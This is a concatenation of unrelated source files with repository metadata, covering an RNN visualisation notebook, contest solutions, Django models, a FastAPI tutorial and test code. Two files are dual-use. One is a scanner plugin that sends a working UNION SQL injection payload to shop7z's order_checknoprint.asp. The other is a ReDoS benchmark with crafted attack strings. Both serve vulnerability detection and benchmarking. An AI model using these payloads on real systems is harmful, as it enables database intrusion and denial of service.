# config = './config/base.yaml'
# config = './config/base_e2e.yaml'
config = './config/large.yaml'
config = './config/large_adv.yaml'
version = 5
version = 0
version = 2
config = './config/large_adv_sin.yaml'
version = 4
config = './config/large_sin.yaml'
# version = 18
version = 19
# config = './config/snakes_slow.yaml'
# version = 0
# version = 2
# version = 3
config = './config/snakes.yaml'
version = 9
config = './config/snakes_large.yaml'
version = 0
config = './config/snakes_cifar.yaml'
version = 6
# TODO add state_dict
config = './config/snakes_ssim.yaml'
version = 3
config = './config/pdi.yaml'
version = 0
# version = 3
config = './config/pdi_polar.yaml'
version = 7
config = './config/circ.yaml'
version = 0
config = './config/troxler_batch_clean.yaml'
config = './config/troxler_batch.yaml'
version = 0
# config = './config/pdi_fourier.yaml'
# config ='./config/pdi_fourier_noise.yaml'
# config = './config/pdi_fourier_random.yaml'
config = './config/pdi_fourier_noise_random.yaml'
version = 0 # Overfit
# version = 2 # Generalization
variant = osp.split(config)[1].split('.')[0]
config = get_config(config)
root = Path(f'runs/{variant}-{seed}/lightning_logs/')
# * This is the default output, if you want to play around with a different checkpoint load it here.
model_ckpt = list(root.joinpath(f"version_{version}").joinpath('checkpoints').glob("*"))[0]
weights = torch.load(model_ckpt, map_location='cpu')
model = SaccadingRNN(config)
model.load_state_dict(weights['state_dict'])
model.eval()
if config.TASK.NAME == 'UNIFORMITY':
    dataset = UniformityDataset(config, split="train")
else:
    # Bug fix: "UniformistyDataset" was a typo (NameError) -- every task
    # other than UNIFORMITY crashed here.  The correct class name is used
    # on the UNIFORMITY branch above and in the commented test-split line.
    dataset = UniformityDataset(config, split="train", dataset_root=f'./data/{config.TASK.NAME}', augment=['rotate'])
    # dataset = UniformityDataset(config, split="test", dataset_root=f'./data/{config.TASK.NAME}')
index = 0
# index = 2
# index = 9
# index = 25000
# index = 700
# index = 750
# index = 800
image = dataset[index]
proc_view = UniformityDataset.unpreprocess(image).permute(1, 2, 0)
proc_view = proc_view.squeeze(-1)
plt.imshow(proc_view)
sac_length = 50
saccades = model._generate_saccades(image, length=sac_length)[:, :1]
all_views, noised_views, patches, state = model.predict_with_saccades(image, saccades, mode='predictive_patch')
# Note, simply using saccades twice in a row is OOD.
# all_views, noised_views, patches, state = model.predict(image)
# Hm, doesn't seem to matter.... am I looking at the right output?
# Why is my loss higher than reported?
print(all_views.size(), patches.size())
loss1 = F.mse_loss(all_views[1], patches[0])
loss1 = F.mse_loss(all_views[1:], patches)
print(loss1)
print(saccades.float().mean())
plt.imshow(image.squeeze(0))
plt.axis('off')
# Wow, there's barely any loss... what gives?
# losses = [F.mse_loss(all_views[i+1], patches[i]) for i in range(49)]
# plt.plot(losses)
#%%
# It don't even look like the right image.
times = [0, 10, 20, 30]
f, axes = plt.subplots(len(times), 2, sharex=True, sharey=True)
for i, t in enumerate(times):
true_image = all_views[t + all_views.size(0) - patches.size(0), 0]
# true_image = noised_views[t + all_views.size(0) - patches.size(0), 0]
proc_true = UniformityDataset.unpreprocess(true_image).permute(1, 2, 0)
proc_true = proc_true.squeeze(-1)
# axes[i, 0].imshow(proc_true[..., 2])
axes[i, 0].imshow(proc_true)
pred_image = patches[t, 0]
print(F.mse_loss(true_image, pred_image)) # how can my average in the previous timestep be lower than all my samples here?
proc_pred = UniformityDataset.unpreprocess(pred_image).permute(1, 2, 0)
proc_pred = proc_pred.squeeze(-1)
# axes[i, 1].imshow(proc_pred[..., 2])
axes[i, 1].imshow(proc_pred)
axes[0, 0].set_title('True')
axes[0, 1].set_title('Pred')
plt.savefig('test.png')
#%%
import numpy as np
step = 3
grid_h = np.linspace(0, image.size(-2)-1, step)
grid_w = np.linspace(0, image.size(-1)-1, step)
grid_x, grid_y = np.meshgrid(grid_h, grid_w)
grid = torch.stack([torch.tensor(grid_x), torch.tensor(grid_y)], dim=-1).long()
grid = grid.flatten(0, 1)
step_state = state.expand(grid.size(0), -1, -1)
patches = model._predict_at_location(step_state, grid.unsqueeze(1), mode='patch').detach()
print(patches.size())
# Assemble patches
w_span, h_span = model.cfg.FOV_WIDTH // 2, model.cfg.FOV_HEIGHT // 2
padded_image = F.pad(image.squeeze(0), (w_span, w_span, h_span, h_span))
belief = torch.zeros_like(padded_image).detach()
# Pad image
for patch, loc in zip(patches, grid):
belief[
loc[0]: loc[0] + 2 * w_span,
loc[1]: loc[1] + 2 * h_span
] = patch
f, axes = plt.subplots(1, 2, sharex=True, sharey=True)
print(saccades.size()) # ! I think there's a transpose happening
axes[0].scatter(*(saccades.T + w_span), color='white')
# Flip direction since saccade higher = matrix lower
axes[0].imshow(padded_image, origin='lower')
axes[0].set_title('True')
axes[0].axis('off')
axes[1].imshow(belief, origin='lower')
axes[1].set_title('Perceived')
axes[1].axis('off')
plt.savefig('test.png', dpi=300)
# %%
#%%
plt.imshow(image.squeeze(0))
plt.savefig('test.png', dpi=300)
#%%
all_views, noised_views, patches, state = model.predict_with_saccades(image, saccades, mode='predictive_patch')
fixate_saccades = model._generate_saccades(image, mode='fixate')
all_views, noised_views, patches, fixate_state = model.predict_with_saccades(image, fixate_saccades, mode='predictive_patch', initial_state=None)
# all_views, noised_views, patches, fixate_state = model.predict_with_saccades(image, fixate_saccades, mode='predictive_patch', initial_state=state)
step = 3
grid_h = np.linspace(0, image.size(-2), step)
grid_w = np.linspace(0, image.size(-1), step)
grid_x, grid_y = np.meshgrid(grid_h, grid_w)
grid = torch.stack([torch.tensor(grid_x), torch.tensor(grid_y)], dim=-1).long()
grid = grid.flatten(0, 1)
step_state = state.expand(grid.size(0), -1, -1)
step_fixate = fixate_state.expand(grid.size(0), -1, -1)
patches = model._predict_at_location(step_state, grid, mode='patch').detach()
fixate_patches = model._predict_at_location(step_fixate, grid, mode='patch').detach()
# Assemble patches
w_span, h_span = model.cfg.FOV_WIDTH // 2, model.cfg.FOV_HEIGHT // 2
padded_image = F.pad(image.squeeze(0), (w_span, w_span, h_span, h_span))
belief = torch.zeros_like(padded_image).detach()
fixate_belief = torch.zeros_like(padded_image).detach()
# Pad image
for patch, fixate_patch, loc in zip(patches, fixate_patches, grid):
belief[
loc[0]: loc[0] + 2 * w_span,
loc[1]: loc[1] + 2 * h_span
] = patch
fixate_belief[
loc[0]: loc[0] + 2 * w_span,
loc[1]: loc[1] + 2 * h_span
] = fixate_patch
f, axes = plt.subplots(1, 3, sharex=True, sharey=True)
axes[1].scatter(*(saccades.T + w_span), color='white')
axes[0].imshow(padded_image)
axes[0].set_title('True')
axes[0].axis('off')
axes[1].imshow(belief)
axes[1].set_title('Perceived')
axes[1].axis('off')
axes[2].imshow(fixate_belief)
axes[2].set_title('Fixation (w/o saccade)')
axes[2].axis('off')
axes[2].scatter(*(fixate_saccades.T + w_span), color='white')
plt.savefig('test.png', dpi=300)
| [
"joelye9@gmail.com"
] | joelye9@gmail.com |
6021df1a5e4afffdf7611d6391b4abe981929627 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2845/60765/274571.py | e890da8bf65c177ac99bcb7981532e0c0a99bf23 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
n=input()
# n,t=list(map(int,input().split()))
#serial=input().split()
a=list(map(int,input().split()))
b=list(map(int,input().split()))
n=len(b)
c=[[a[i],b[i]] for i in range(n)]
c.sort(key=lambda x:x[0])
# print(c)
result=[c[i][1]-c[i+1][1] for i in range(n-1)]
for i in range(n-1):
if result[i]>0:
print('Happy Alex')
break
elif i==n-2:
print('Poor Alex')
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
c6406ced2221fb7e2c50769c42574bc91280dd5a | 0adb68bbf576340c8ba1d9d3c07320ab3bfdb95e | /regexlib/2021-5-15/python_re_test_file/regexlib_7745.py | ffca8351109d1a4bdc6278e4c8266b6f3ecf2f39 | [
"MIT"
] | permissive | agentjacker/ReDoS-Benchmarks | c7d6633a3b77d9e29e0ee2db98d5dfb60cde91c6 | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | refs/heads/main | 2023-05-10T13:57:48.491045 | 2021-05-21T11:19:39 | 2021-05-21T11:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | # 7745
# ^\w*[-]*\w*\\\w*$
# POLYNOMIAL
# nums:4
# POLYNOMIAL AttackString:""+"0"*10000+"! _1_POA(i)"
import re
from time import perf_counter
# ReDoS benchmark: time re.search on increasingly long attack strings to
# demonstrate polynomial backtracking in the pattern below.
regex = """^\w*[-]*\w*\\\w*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    # Attack input: i*10000 zeros followed by a suffix that forces a
    # non-match, maximizing backtracking.
    ATTACK = "" + "0" * i * 10000 + "! _1_POA(i)"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *10000}: took {DURATION} seconds!")
"liyt@ios.ac.cn"
] | liyt@ios.ac.cn |
9cd31045bab54a275a87b2929087052987ccfdcd | 04b1803adb6653ecb7cb827c4f4aa616afacf629 | /third_party/blink/web_tests/external/wpt/xhr/resources/inspect-headers.py | e71f671ced34ff3d447467ea4098e6e000ffd8f7 | [
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | Samsung/Castanets | 240d9338e097b75b3f669604315b06f7cf129d64 | 4896f732fc747dfdcfcbac3d442f2d2d42df264a | refs/heads/castanets_76_dev | 2023-08-31T09:01:04.744346 | 2021-07-30T04:56:25 | 2021-08-11T05:45:21 | 125,484,161 | 58 | 49 | BSD-3-Clause | 2022-10-16T19:31:26 | 2018-03-16T08:07:37 | null | UTF-8 | Python | false | false | 1,356 | py | def get_response(raw_headers, filter_value, filter_name):
result = ""
for line in raw_headers.headers:
if line[-2:] != '\r\n':
return "Syntax error: missing CRLF: " + line
line = line[:-2]
if ': ' not in line:
return "Syntax error: no colon and space found: " + line
name, value = line.split(': ', 1)
if filter_value:
if value == filter_value:
result += name + ","
elif name.lower() == filter_name:
result += name + ": " + value + "\n"
return result
def main(request, response):
    """wptserve handler: report request headers filtered by name or value.

    With ?cors in the query string the response carries permissive CORS
    headers.  The body lists header names whose value equals
    ``filter_value`` (comma-separated), or ``name: value`` lines for
    headers matching ``filter_name``.
    """
    response_headers = []
    if "cors" in request.GET:
        response_headers.extend([
            ("Access-Control-Allow-Origin", "*"),
            ("Access-Control-Allow-Credentials", "true"),
            ("Access-Control-Allow-Methods", "GET, POST, PUT, FOO"),
            ("Access-Control-Allow-Headers", "x-test, x-foo"),
            ("Access-Control-Expose-Headers", "x-request-method, x-request-content-type, x-request-query, x-request-content-length"),
        ])
    response_headers.append(("content-type", "text/plain"))
    wanted_value = request.GET.first("filter_value", "")
    wanted_name = request.GET.first("filter_name", "").lower()
    body = get_response(request.raw_headers, wanted_value, wanted_name)
    return response_headers, body
| [
"sunny.nam@samsung.com"
] | sunny.nam@samsung.com |
69e8b76324acdc71454c9bed7115bb9276cc104c | 09f205f74070c53e694d52f0bc72e203a2fd224f | /docs_src/query_params/tutorial006.py | d764c2a863e0809462be935bbc57ab24d2df9b29 | [
"MIT"
] | permissive | RunningIkkyu/fastapi | 53c02fed44b9e30e8617c94ec902be7ca579e42b | 05736c40d3fbb008fd9cdbe1adb8fcef7676e0c6 | refs/heads/master | 2021-05-18T07:58:33.640797 | 2020-05-21T01:36:47 | 2020-05-21T01:36:47 | 251,189,158 | 2 | 0 | MIT | 2020-05-21T01:36:49 | 2020-03-30T03:13:43 | Python | UTF-8 | Python | false | false | 256 | py | from fastapi import FastAPI
app = FastAPI()
@app.get("/items/{item_id}")
async def read_user_item(item_id: str, needy: str, skip: int = 0, limit: int = None):
    """Echo the path parameter and query parameters back as a dict.

    ``needy`` is a required query parameter; ``skip`` and ``limit`` are
    optional.
    """
    return {"item_id": item_id, "needy": needy, "skip": skip, "limit": limit}
| [
"tiangolo@gmail.com"
] | tiangolo@gmail.com |
9f5f60cd24bb4ba0a3ed8fc4a7b797829f8a4512 | 181af10fcf40b824fe92d3b8f72fd15d6d1490c2 | /Biweekly Contests/51-100/biweek 98/2568. Minimum Impossible OR/Minimum Impossible OR.py | 6bbcc085906cb358f19e80cbfef2653c5595026a | [] | no_license | wangyendt/LeetCode | 402c59a0b7b7f5b3a672231ea5dad8056ade36af | 4a3ba15284c45b2d8bf38306c8c8526ae174615c | refs/heads/master | 2023-08-10T06:27:54.995152 | 2023-08-10T02:22:27 | 2023-08-10T02:22:27 | 176,651,399 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | """
@author: wangye(Wayne)
@license: Apache Licence
@file: Minimum Impossible OR.py
@time: 20230330
@contact: wang121ye@hotmail.com
@site: wangyendt@github.com
@software: PyCharm
# code is far away from bugs.
"""
from typing import *
class Solution:
def minImpossibleOR(self, nums: List[int]) -> int:
nums_set = set(nums)
for i in range(1000):
if (1 << i) not in nums_set:
return 1 << i
so = Solution()
print(so.minImpossibleOR(nums=[4, 32, 16, 8, 8, 75, 1, 2]))
| [
"905317742@qq.com"
] | 905317742@qq.com |
160bdd13a34885811fabe3e183291048859c9306 | 4296cb5b97a69382d1fe6b73753a2ffcd1d154c5 | /tenkei90/064.py | 05309a40d520930ec7dd6c78e4e01ef920de1155 | [] | no_license | tokuD/atcoder | a199a5fe92be54d0b66ceaf6158116984f52cd01 | a95a0380af129109fcf48eb1d4994bbb52925320 | refs/heads/master | 2023-08-28T10:28:55.763895 | 2021-11-13T15:49:38 | 2021-11-13T15:49:38 | 371,675,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | def main():
N,Q = map(int,input().split())
A = list(map(int,input().split()))
LRV = [list(map(int,input().split())) for i in range(Q)]
dif = []
ans = 0
for i in range(N-1):
dif.append(A[i+1]-A[i])
for i in range(N-1):
ans += abs(dif[i])
for i in range(Q):
L,R,V = map(lambda x: x-1,LRV[i])
V += 1
if L > 0:
ans -= abs(dif[L-1])
dif[L-1] += V
ans += abs(dif[L-1])
if R < N-1:
ans -= abs(dif[R])
dif[R] -= V
ans += abs(dif[R])
print(ans)
if __name__ == '__main__':
main()
| [
"megumu112851@gmail.com"
] | megumu112851@gmail.com |
5b09999136264f3b86f6cc291e202df18999fb3c | 5fd59608e3b0ea2a92ac19f9104f7a9a7c10bd03 | /apps/components/floors/models.py | 1d6656253db58a9a35934385d3f2eefc22f5ecc2 | [] | no_license | tmac408/makahiki | 47251470e1db3ee2fa6a7fdfd5ac83153dd7945a | c489bc6870a755bcb4c830be9c112047afde9fbe | refs/heads/master | 2021-01-10T20:35:27.096381 | 2011-07-05T04:27:54 | 2011-07-05T04:27:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,973 | py | import datetime
from django.db import models
from django.contrib.auth.models import User
from django.template.defaultfilters import slugify
from django.db.models import Sum, Max, Q
from components.makahiki_base import get_floor_label, get_current_round
# Create your models here.
class Dorm(models.Model):
    """A dormitory; its floors compete on points."""

    # NOTE(review): ``prepopulated_fields`` is a ModelAdmin option, not a
    # Model option -- Django ignores it here.  Kept for compatibility; it
    # should move to the admin registration.
    prepopulated_fields = {"slug": ("name",)}

    name = models.CharField(max_length=200, help_text="The name of the dorm.")
    slug = models.SlugField(max_length=20, help_text="Automatically generated if left blank.")
    created_at = models.DateTimeField(editable=False)
    updated_at = models.DateTimeField(null=True, editable=False)

    def __unicode__(self):
        return self.name

    def floor_points_leaders(self, num_results=10, round_name=None):
        """
        Returns the top points leaders for the given dorm.

        When ``round_name`` is given, only that round's scoreboard entries
        count; otherwise overall profile points are used.
        """
        if round_name:
            return self.floor_set.filter(
                profile__scoreboardentry__round_name=round_name
            ).annotate(
                points=Sum("profile__scoreboardentry__points"),
                last=Max("profile__scoreboardentry__last_awarded_submission")
            ).order_by("-points", "-last")[:num_results]

        return self.floor_set.annotate(
            points=Sum("profile__points"),
            last=Max("profile__last_awarded_submission")
        ).order_by("-points", "-last")[:num_results]

    def save(self, *args, **kwargs):
        """Custom save method to generate slug and set created_at/updated_at."""
        if not self.slug:
            self.slug = slugify(self.name)
        if not self.created_at:
            # NOTE(review): a date is stored into a DateTimeField here
            # (datetime.date.today()); Django coerces it, but a full
            # datetime would be more precise -- confirm before changing
            # stored values.
            self.created_at = datetime.date.today()
        else:
            self.updated_at = datetime.date.today()
        # Bug fix: the accepted *args/**kwargs (e.g. ``using=``,
        # ``force_insert=``) were silently dropped; forward them to Django.
        super(Dorm, self).save(*args, **kwargs)
class Floor(models.Model):
    """A floor within a dorm; the unit that individuals belong to and that
    competes on points."""
    # NOTE(review): ``prepopulated_fields`` is a ModelAdmin option, not a
    # Model option -- Django ignores it here.
    prepopulated_fields = {"slug": ("number",)}
    number = models.CharField(help_text="The floor number in the dorm. Can be a string value", max_length=10)
    slug = models.SlugField(max_length=10, help_text="Automatically generated if left blank.")
    dorm = models.ForeignKey(Dorm, help_text="The dorm this floor belongs to.")
    floor_identifier = models.CharField(
        max_length=200,
        blank=True,
        null=True,
        help_text="Name of the source used in WattDepot to refer to this floor."
    )
    def __unicode__(self):
        """E.g. "Dorm name: Floor 3" using the configured floor label."""
        return "%s: %s %s" % (self.dorm.name, get_floor_label(), self.number)
    @staticmethod
    def floor_points_leaders(num_results=10, round_name=None):
        """
        Returns the floor points leaders across all dorms.
        """
        if round_name:
            return Floor.objects.filter(
                profile__scoreboardentry__round_name=round_name
            ).annotate(
                points=Sum("profile__scoreboardentry__points"),
                last=Max("profile__scoreboardentry__last_awarded_submission")
            ).order_by("-points", "-last")[:num_results]
        return Floor.objects.annotate(
            points=Sum("profile__points"),
            last=Max("profile__last_awarded_submission")
        ).order_by("-points", "-last")[:num_results]
    def points_leaders(self, num_results=10, round_name=None):
        """
        Gets the individual points leaders for the floor.
        """
        if round_name:
            return self.profile_set.filter(
                scoreboardentry__round_name=round_name
            ).order_by("-scoreboardentry__points", "-scoreboardentry__last_awarded_submission")[:num_results]
        return self.profile_set.all().order_by("-points", "-last_awarded_submission")[:num_results]
    def current_round_rank(self):
        """Rank within the current round, or None if no round is active."""
        current_round = get_current_round()
        if current_round:
            return self.rank(round_name=current_round)
        return None
    def rank(self, round_name=None):
        """Returns the rank of the floor across all dorms."""
        # Rank = 1 + number of floors strictly ahead on points, with an
        # earlier last-awarded-submission timestamp breaking ties.
        if round_name:
            # Imported locally, presumably to avoid a circular import with
            # the profiles app -- confirm before hoisting to module level.
            from components.makahiki_profiles.models import ScoreboardEntry
            aggregate = ScoreboardEntry.objects.filter(
                profile__floor=self,
                round_name=round_name
            ).aggregate(points=Sum("points"), last=Max("last_awarded_submission"))
            points = aggregate["points"] or 0
            last_awarded_submission = aggregate["last"]
            # Group by floors, filter out other rounds, and annotate.
            # NOTE(review): this branch names its Max() annotation
            # ``last_awarded`` but the tie-break filter below uses
            # ``last_awarded_submission``, which on ScoreboardEntry is a raw
            # field -- verify the round-scoped tie-break behaves as intended.
            annotated_floors = ScoreboardEntry.objects.values("profile__floor").filter(
                round_name=round_name
            ).annotate(
                floor_points=Sum("points"),
                last_awarded=Max("last_awarded_submission")
            )
        else:
            aggregate = self.profile_set.aggregate(points=Sum("points"), last=Max("last_awarded_submission"))
            points = aggregate["points"] or 0
            last_awarded_submission = aggregate["last"]
            annotated_floors = Floor.objects.annotate(
                floor_points=Sum("profile__points"),
                last_awarded_submission=Max("profile__last_awarded_submission")
            )
        count = annotated_floors.filter(floor_points__gt=points).count()
        # If there was a submission, tack that on to the count.
        if last_awarded_submission:
            count = count + annotated_floors.filter(
                floor_points=points,
                last_awarded_submission__gt=last_awarded_submission
            ).count()
        return count + 1
    def current_round_points(self):
        """Returns the number of points for the current round."""
        current_round = get_current_round()
        if current_round:
            return self.points(round_name=current_round)
        return None
    def points(self, round_name=None):
        """Returns the total number of points for the floor. Takes an optional parameter for a round."""
        if round_name:
            from components.makahiki_profiles.models import ScoreboardEntry
            dictionary = ScoreboardEntry.objects.filter(profile__floor=self, round_name=round_name).aggregate(Sum("points"))
        else:
            dictionary = self.profile_set.aggregate(Sum("points"))
        return dictionary["points__sum"] or 0
    def save(self):
        """Custom save method to generate slug and set created_at/updated_at."""
        # NOTE(review): unlike Dorm.save, this signature takes no
        # *args/**kwargs, so Django calls like save(using=...) would raise
        # TypeError -- consider aligning the signatures.
        if not self.slug:
            self.slug = slugify(self.number)
        super(Floor, self).save()
class Post(models.Model):
"""Represents a wall post on a user's wall."""
user = models.ForeignKey(User)
floor = models.ForeignKey(Floor)
text = models.TextField()
style_class = models.CharField(max_length=50, default="user_post") #CSS class to apply to this post.
created_at = models.DateTimeField(editable=False)
def date_string(self):
"""Formats the created date into a pretty string."""
return self.created_at.strftime("%m/%d %I:%M %p")
def save(self):
if not self.created_at:
self.created_at = datetime.datetime.today()
super(Post, self).save()
class PostComment(models.Model):
user = models.ForeignKey(User)
post = models.ForeignKey(Post)
text = models.TextField()
created_at = models.DateTimeField(editable=False)
def save(self):
if not self.created_at:
self.created_at = datetime.date.today()
super(PostComment, self).save() | [
"keoki.lee@gmail.com"
] | keoki.lee@gmail.com |
45e77e2a9c803a25003af8d423e528ff7874eea9 | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/shop7z/shop7z_order_checknoprint_sqli.py | 85f9412e216939cff4178425a6cdb8666ba5093a | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,414 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: shop7z order_checknoprint.asp SQL注入
referer: http://www.wooyun.org/bugs/wooyun-2010-068345
author: Lucifer
description: 文件order_checknoprint.asp中,参数id存在SQL注入。
'''
import sys
import requests
class shop7z_order_checknoprint_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/order_checknoprint.asp?checkno=1&id=1%20UNION%20SELECT%201%2C2%2CCHR%2832%29%2bCHR%2835%29%2bCHR%28116%29%2bCHR%28121%29%2bCHR%28113%29%2bCHR%2835%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%20from%20MSysAccessObjects"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"#tyq#" in req.text:
return "[+]存在shop7z order_checknoprint.asp SQL注入漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = shop7z_order_checknoprint_sqli_BaseVerify(sys.argv[1])
testVuln.run() | [
"834430486@qq.com"
] | 834430486@qq.com |
0fbf2d8f2f31b5556b486c568da417a2ac0933a1 | 4b379051aa3430eb2d8931f6055772731dcb199d | /512-Python_основы_и_применение/24471/stepik-512_24471-step7.py | 8ead90784919d275251ba0e63a734f6a778ab201 | [] | no_license | dmikos/stepikCourse | 1416614ef51a4352374f37e86e3211c3b42cbaf6 | 3faeabfdc56cac597fb6b1495e7bb38a7f2a6816 | refs/heads/master | 2021-01-12T17:06:37.720050 | 2016-11-21T14:37:20 | 2016-11-21T14:37:20 | 69,057,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | import requests
import re
from urllib.parse import urlparse
# link = input()
link = "http://hosting.ukrtelecom.ua/stepik-512_24471-step7.html"
# link = "http://pastebin.com/raw/2mie4QYa"
#test3
# link = "http://pastebin.com/raw/7543p0ns"
# link = "http://hosting.ukrtelecom.ua/stepik-512_24471-step7-test3.html"
pattern = re.compile(r"href *= *[',\"].+[',\"]")
res = pattern.findall(requests.get(link).text)
finset = set()
for line in res:
line = re.split(r"[',\"]", str(line))[1]
if line.startswith("../"):
continue
elif urlparse(line).scheme == '':
# finset.add((urlparse(line).path).split(':')[0]) if urlparse(line).port else finset.add(urlparse(line).path)
finset.add(urlparse(line).path)
elif urlparse(line).scheme:
finset.add((urlparse(line).netloc).split(':')[0]) if urlparse(line).port else finset.add(urlparse(line).netloc)
# print(sorted(finset))
for stroke in sorted(finset):
print(stroke)
"""
Output
mail.ru
neerc.ifmo.ru
stepic.org
www.ya.ru
ya.ru
""" | [
"dkostinov@gmail.com"
] | dkostinov@gmail.com |
67aa0ecaa841b2950f17b83d5e2e87f4235094b3 | 0a1e4f7105aba084054eaf32e2000efaa564a3cd | /Chap 7/viet_hoa_ten.py | b59b4001c9bd0093bfc5f8ef44fe983fb78fbcb8 | [] | no_license | tucpy/basic_python | b322cf4def209b165a4cd84994f13c41d14d3ec7 | 28adf05c1ef3f81dbcc034daea370d5e5b7b6ad6 | refs/heads/master | 2020-03-29T01:13:52.067014 | 2018-10-27T01:31:15 | 2018-10-27T01:31:15 | 149,378,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py |
chuoi = str(input("Nhap ho va ten: "))
list_tu = chuoi.split()
print(list_tu)
chuoi_xu_ly =""
for tu in list_tu:
tu_xu_ly = tu.capitalize()
chuoi_xu_ly += tu_xu_ly +" "
print(chuoi_xu_ly) | [
"phtu05@gmail.com"
] | phtu05@gmail.com |
630141755dcdf5e0317aa3414d0bb6b99e0586e3 | 12b34dcd389dec2095ef454d9dc89976ff7c7215 | /code/one_max_multiprocessing.py | 402d190d1a000a9391c9f19e047fb9994c41ae2f | [] | no_license | mariosky/PPSN2014 | ce0d64a3f61b36b467acab33297481a7e590dcf0 | a2ce8971951e2af311146d74cb043e68ff90cc67 | refs/heads/master | 2020-05-30T12:03:01.086997 | 2014-11-23T17:01:41 | 2014-11-23T17:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,192 | py | __author__ = 'mariosky'
from multiprocessing import Pool
import one_max
import time, yaml
config = yaml.load(open("conf/conf.yaml"))
experiment = "w%d-%d-p%d" % (config["NUMBER_OF_WORKERS"],config["SAMPLE_SIZE"],config["POPULATION_SIZE"])
experiment_id = experiment + "-%d" % round(time.time(),0)
datafile = open("data/one_max-"+experiment_id+".dat","a")
conf_out = open("conf/one_max-"+experiment_id+".yaml","w")
yaml.dump(config, conf_out)
conf_out.close()
for i in range(30):
print '############################'
print '############################'
start = time.time()
one_max.initialize(config)
tInitialize = time.time()-start
print i, tInitialize
p = Pool(config["NUMBER_OF_WORKERS"])
params = [(w, config) for w in range(config["NUMBER_OF_WORKERS"])]
start = time.time()
results = p.map(one_max.work, params)
#print results
tTotal = time.time()-start
totals = "%d,%0.2f,%0.2f" % (i, round(tTotal,2), round(tInitialize,2))
print totals
datafile.write(totals + '\n')
for worker_list in results:
for data_list in worker_list:
datafile.write(str(i) +"," + ",".join(map(str,data_list)) + '\n')
| [
"mariosky@gmail.com"
] | mariosky@gmail.com |
614d791a27c148a546020e8be0519f9e59df2dd7 | 23f5ef8f31ff54f7166c98f76c00c6fef0dd9caa | /tests/pytests/unit/test_beacons.py | 27940c6f65e5d151e712147a056ff67a91c4cbd1 | [
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] | permissive | afischer-opentext-com/salt | 42bfe2e6e1a86bf8dd30b5a6db4d8e575ac9ca99 | b011a4ed6b29e3d2e8242e5909721dcda75d14df | refs/heads/master | 2022-10-25T00:01:07.138687 | 2021-09-27T16:24:02 | 2021-09-27T16:46:43 | 407,080,050 | 0 | 0 | Apache-2.0 | 2021-09-16T08:12:53 | 2021-09-16T08:12:52 | null | UTF-8 | Python | false | false | 2,476 | py | """
unit tests for the beacon_module parameter
"""
import logging
import salt.config
from tests.support.mock import MagicMock, call, patch
log = logging.getLogger(__name__)
def test_beacon_process():
"""
Test the process function in the beacon class
returns the correct information when an exception
occurs
"""
mock_opts = salt.config.DEFAULT_MINION_OPTS.copy()
mock_opts["id"] = "minion"
mock_opts["__role"] = "minion"
mock_opts["beacons"] = {
"watch_apache": [
{"processes": {"apache2": "stopped"}},
{"beacon_module": "ps"},
]
}
beacon_mock = MagicMock(side_effect=Exception("Global Thermonuclear War"))
beacon_mock.__globals__ = {}
beacon = salt.beacons.Beacon(mock_opts, [])
found = "ps.beacon" in beacon.beacons
beacon.beacons["ps.beacon"] = beacon_mock
ret = beacon.process(mock_opts["beacons"], mock_opts["grains"])
_expected = [
{
"tag": "salt/beacon/minion/watch_apache/",
"error": "Global Thermonuclear War",
"data": {},
"beacon_name": "ps",
}
]
assert ret == _expected
def test_beacon_module():
"""
Test that beacon_module parameter for beacon configuration
"""
mock_opts = salt.config.DEFAULT_MINION_OPTS.copy()
mock_opts["id"] = "minion"
mock_opts["__role"] = "minion"
mock_opts["beacons"] = {
"watch_apache": [
{"processes": {"apache2": "stopped"}},
